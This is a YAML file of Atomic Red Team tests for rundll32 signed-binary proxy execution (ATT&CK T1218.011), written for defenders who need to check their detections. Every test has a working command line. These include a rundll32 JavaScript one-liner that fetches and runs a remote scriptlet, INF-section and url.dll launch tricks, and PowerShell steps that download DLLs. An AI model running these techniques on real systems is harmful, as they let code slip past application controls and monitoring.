c8a70997da
* Update T1202.yaml * fix all atomics * changing to macos to fix pytest issue * changing to macos to fix pytest issue * adding gitignore
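---
# Atomic Red Team test definitions for ATT&CK T1218.011 (Rundll32 proxy
# execution). Each entry under `atomic_tests` is one detection-validation
# scenario: `description` is free text, `input_arguments` declares the
# `#{name}` placeholders substituted into the command lines, `dependencies`
# holds the prereq / get-prereq checks run under `dependency_executor_name`,
# and `executor` is the command line run under `executor.name`.
attack_technique: T1218.011
display_name: 'Signed Binary Proxy Execution: Rundll32'
atomic_tests:
  - name: Rundll32 execute JavaScript Remote Payload With GetObject
    auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d
    description: |
      Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
      This has been used by Win32/Poweliks malware and works as described [here](https://www.stormshield.com/news/poweliks-command-line-confusion/)

      Note: The GetObject function is no longer supported in Internet Explorer v9 (2011) and later so this technique would only work where very old versions of IE are installed.
    supported_platforms:
      - windows
    input_arguments:
      file_url:
        description: location of the payload
        type: url
        default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct
    executor:
      command: |
        rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();window.close();
      cleanup_command: |
        taskkill /IM notepad.exe /f
      name: command_prompt

  - name: Rundll32 execute VBscript command
    auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb
    description: |
      Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
      Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/
      Upon execution calc.exe will be launched
    supported_platforms:
      - windows
    input_arguments:
      command_to_execute:
        description: Command for rundll32.exe to execute
        type: string
        default: calc.exe
    executor:
      command: |
        rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
      name: command_prompt

  - name: Rundll32 execute VBscript command using Ordinal number
    auto_generated_guid: 32d1cf1b-cbc2-4c09-8d05-07ec5c83a821
    description: |
      Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
      Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/
      Upon execution calc.exe will be launched
    supported_platforms:
      - windows
    input_arguments:
      command_to_execute:
        description: Command for rundll32.exe to execute
        type: string
        default: calc.exe
    executor:
      command: |
        rundll32 vbscript:"\..\mshtml,#135 "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
      name: command_prompt

  - name: Rundll32 advpack.dll Execution
    auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89
    description: |
      Test execution of a command using rundll32.exe with advpack.dll.
      Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml
      Upon execution calc.exe will be launched
    supported_platforms:
      - windows
    input_arguments:
      inf_to_execute:
        description: Local location of inf file
        type: string
        default: PathToAtomicsFolder\T1218.011\src\T1218.011.inf
    dependency_executor_name: powershell
    dependencies:
      - description: |
          Inf file must exist on disk at specified location ("#{inf_to_execute}")
        prereq_command: |
          if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
        get_prereq_command: |
          New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
    executor:
      command: |
        rundll32.exe advpack.dll,LaunchINFSection "#{inf_to_execute}",DefaultInstall_SingleUser,1,
      name: command_prompt

  - name: Rundll32 ieadvpack.dll Execution
    auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9
    description: |
      Test execution of a command using rundll32.exe with ieadvpack.dll.
      Upon execution calc.exe will be launched

      Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml
    supported_platforms:
      - windows
    input_arguments:
      inf_to_execute:
        description: Local location of inf file
        type: string
        default: PathToAtomicsFolder\T1218.011\src\T1218.011.inf
    dependency_executor_name: powershell
    dependencies:
      - description: |
          Inf file must exist on disk at specified location ("#{inf_to_execute}")
        prereq_command: |
          if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
        get_prereq_command: |
          New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
    executor:
      command: |
        rundll32.exe ieadvpack.dll,LaunchINFSection "#{inf_to_execute}",DefaultInstall_SingleUser,1,
      name: command_prompt

  - name: Rundll32 syssetup.dll Execution
    auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125
    description: |
      Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened

      Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml
    supported_platforms:
      - windows
    input_arguments:
      inf_to_execute:
        description: Local location of inf file
        type: string
        default: PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf
    dependency_executor_name: powershell
    dependencies:
      - description: |
          Inf file must exist on disk at specified location ("#{inf_to_execute}")
        prereq_command: |
          if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
        get_prereq_command: |
          New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
    executor:
      command: |
        rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 "#{inf_to_execute}"
      name: command_prompt

  - name: Rundll32 setupapi.dll Execution
    auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19
    description: |
      Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened

      Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml
    supported_platforms:
      - windows
    input_arguments:
      inf_to_execute:
        description: Local location of inf file
        type: string
        default: PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf
    dependency_executor_name: powershell
    dependencies:
      - description: |
          Inf file must exist on disk at specified location ("#{inf_to_execute}")
        prereq_command: |
          if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
        get_prereq_command: |
          New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
    executor:
      command: |
        rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 "#{inf_to_execute}"
      name: command_prompt

  - name: Execution of HTA and VBS Files using Rundll32 and URL.dll
    auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3
    description: |
      IcedID uses this TTP as follows:
      rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta
      Trickbot uses this TTP as follows:
      rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs

      In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript"
    supported_platforms:
      - windows
    executor:
      command: |
        rundll32.exe url.dll,OpenURL "PathToAtomicsFolder\T1218.011\src\index.hta"
        rundll32.exe URL.dll,FileProtocolHandler "PathToAtomicsFolder\T1218.011\src\akteullen.vbs"
      name: command_prompt

  - name: Launches an executable using Rundll32 and pcwutl.dll
    auto_generated_guid: 9f5d081a-ee5a-42f9-a04e-b7bdc487e676
    description: |
      Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable.
    supported_platforms:
      - windows
    input_arguments:
      exe_to_launch:
        description: Path of the executable to launch
        type: path
        # YAML single quotes are stripped by the parser; the substituted value
        # is the bare %windir% path, which cmd expands.
        default: '%windir%\System32\notepad.exe'
    executor:
      command: |
        rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}
      name: command_prompt

  - name: Execution of non-dll using rundll32.exe
    auto_generated_guid: ae3a8605-b26e-457c-b6b3-2702fd335bac
    description: |
      Rundll32.exe running non-dll
    supported_platforms:
      - windows
    input_arguments:
      input_url:
        description: Url to download the DLL
        type: url
        default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll
      input_file:
        description: Non-dll file
        type: string
        # Both the dependency checks and the executor run under PowerShell,
        # so `$env:username` expands at run time.
        default: C:\Users\$env:username\Downloads\calc.png
    dependency_executor_name: powershell
    dependencies:
      - description: |
          Non-dll file must exist on disk at specified location
        # Quoted like the other prereq checks in this file, so a path
        # containing spaces is still tested as one argument.
        prereq_command: |
          if (Test-Path "#{input_file}") {exit 0} else {exit 1}
        get_prereq_command: |
          Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
    executor:
      name: powershell
      command: |
        rundll32.exe #{input_file}, StartW

  - name: Rundll32 with Ordinal Value
    auto_generated_guid: 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0
    description: |
      Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer.
      Upon successful execution, Calc.exe will spawn.
    supported_platforms:
      - windows
    input_arguments:
      input_url:
        description: Url to download the DLL
        type: url
        # Uses the `raw/master` form like the other download URLs in this
        # file; the `blob/master` page URL returns HTML rather than the file,
        # so Invoke-WebRequest would save a page where the DLL is expected.
        default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx64.dll
      input_file:
        description: DLL File
        type: string
        default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll
    dependency_executor_name: powershell
    dependencies:
      - description: |
          DLL file must exist on disk at specified location
        prereq_command: |
          if (Test-Path "#{input_file}") {exit 0} else {exit 1}
        get_prereq_command: |
          Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
    executor:
      name: command_prompt
      command: |
        rundll32.exe "#{input_file}",#2

  - name: Rundll32 with Control_RunDLL
    auto_generated_guid: e4c04b6f-c492-4782-82c7-3bf75eb8077e
    description: |
      Rundll32.exe loading dll with 'control_rundll' within the command-line, loading a .cpl or another file type related to CVE-2021-40444.
    supported_platforms:
      - windows
    input_arguments:
      input_url:
        description: Url to download the DLL
        type: url
        default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll
      input_file:
        description: DLL File
        type: string
        default: PathToAtomicsFolder\T1047\bin\calc.dll
    dependency_executor_name: powershell
    dependencies:
      - description: |
          DLL file must exist on disk at specified location
        prereq_command: |
          if (Test-Path "#{input_file}") {exit 0} else {exit 1}
        get_prereq_command: |
          Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
    executor:
      name: command_prompt
      command: |
        rundll32.exe shell32.dll,Control_RunDLL "#{input_file}"

  - name: Rundll32 with desk.cpl
    auto_generated_guid: 83a95136-a496-423c-81d3-1c6750133917
    description: |
      Rundll32.exe loading an executable renamed as .scr using desk.cpl
      Reference:
      - [LOLBAS - Libraries/Desk](https://lolbas-project.github.io/lolbas/Libraries/Desk/)
      SIGMA rules:
      - [SCR File Write Event](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/file_event/file_event_win_new_src_file.yml)
      - [Rundll32 InstallScreenSaver Execution](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml)
    supported_platforms:
      - windows
    input_arguments:
      exe_to_launch:
        description: Path of the executable to launch
        type: path
        default: '%windir%\System32\calc.exe'
    executor:
      name: command_prompt
      command: |
        copy #{exe_to_launch} not_an_scr.scr
        rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
      cleanup_command: del not_an_scr.scr

  - name: Running DLL with .init extension and function
    auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6
    description: |
      This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
      DLL created with the AtomicTestHarnesses Portable Executable Builder script.
    supported_platforms:
      - windows
    input_arguments:
      dll_file:
        description: The DLL file to be called
        type: string
        default: PathToAtomicsFolder\T1218.011\bin\_WT.init
      dll_url:
        description: The URL to the DLL file that must be downloaded
        type: url
        default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init
    dependency_executor_name: powershell
    dependencies:
      - description: The DLL file to be called must exist at the specified location (#{dll_file})
        prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1}
        get_prereq_command: |
          New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null
          Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}"
    executor:
      command: |
        rundll32.exe #{dll_file},krnl
      name: command_prompt

  - name: Rundll32 execute command via FileProtocolHandler
    auto_generated_guid: f3ad3c5b-1db1-45c1-81bf-d3370ebab6c8
    description: |
      Test execution of a command using rundll32.exe and the FileProtocolHandler technique.
      Upon execution, calc.exe will be launched.
      This technique is documented by Levan Abesadze - https://medium.com/@Wolverineisstillalive/system-binary-proxy-execution-rundll32-bypass-method-790871e1f2b7
    supported_platforms:
      - windows
    input_arguments:
      command_to_execute:
        description: Command for rundll32.exe to execute
        type: string
        default: calc.exe
    executor:
      command: |
        rundll32.exe url.dll,FileProtocolHandler #{command_to_execute}
      name: command_prompt

  - name: Rundll32 execute payload by calling RouteTheCall
    auto_generated_guid: 8a7f56ee-10e7-444c-a139-0109438288eb
    description: |
      Launch an executable payload by calling RouteTheCall. Test execution of a command using rundll32.exe to execute a payload{calc.exe} by calling RouteTheCall. Upon execution, calc.exe will be launched.
      Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Zipfldr.yml
    supported_platforms:
      - windows
    input_arguments:
      exe_to_launch:
        description: Path of the executable to launch
        type: path
        # NOTE(review): unlike the other exe_to_launch defaults, this value keeps
        # its single quotes after YAML parsing and is then wrapped in double
        # quotes by the command below, and the executor is powershell, which does
        # not expand %windir% itself — confirm the intended value against a run.
        default: "'%windir%\\System32\\calc.exe'"
    executor:
      command: rundll32.exe zipfldr.dll,RouteTheCall "#{exe_to_launch}"
      # No cleanup command is defined for this test (the original carried an
      # empty `cleanup_command:` key, which parses as null).
      name: powershell
      elevation_required: false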